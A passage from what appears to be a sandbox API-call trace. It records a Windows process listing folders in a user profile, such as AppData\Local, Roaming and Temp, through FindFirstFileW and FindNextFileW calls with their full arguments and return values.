ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0301.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0301.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4bf8259, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4bf8259, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0301.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.908] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0301.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af168) returned 1 [0301.909] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData", lpFilePart=0x0) returned 0x1d [0301.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.909] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData", lpFilePart=0x0) returned 0x1d [0301.909] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\", lpFilePart=0x0) returned 0x1e [0301.909] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.910] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.918] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0301.919] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0301.919] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0301.919] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0301.919] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0301.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0301.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0301.920] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData", lpFilePart=0x0) returned 0x1d [0301.920] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\", lpFilePart=0x0) returned 0x1e [0301.920] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.921] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.921] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0301.921] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0301.921] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0301.922] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.922] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0301.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0301.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0301.923] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0301.923] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", lpFilePart=0x0) returned 0x24 [0301.923] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.924] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.924] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0301.925] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0301.925] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0301.925] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0301.925] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xb1dfb94f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xb1dfb94f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xf3693fe1, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x461a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0301.926] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0301.926] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0301.926] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0301.926] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0301.927] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0301.927] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0301.927] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0301.927] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0301.928] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0301.928] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0301.928] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0301.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0301.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0301.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0301.929] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\", lpFilePart=0x0) returned 0x24 [0301.929] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.930] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.930] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0301.930] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0301.930] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0301.931] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0301.931] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xb1dfb94f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xb1dfb94f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xf3693fe1, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x461a, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0301.931] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0301.931] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, 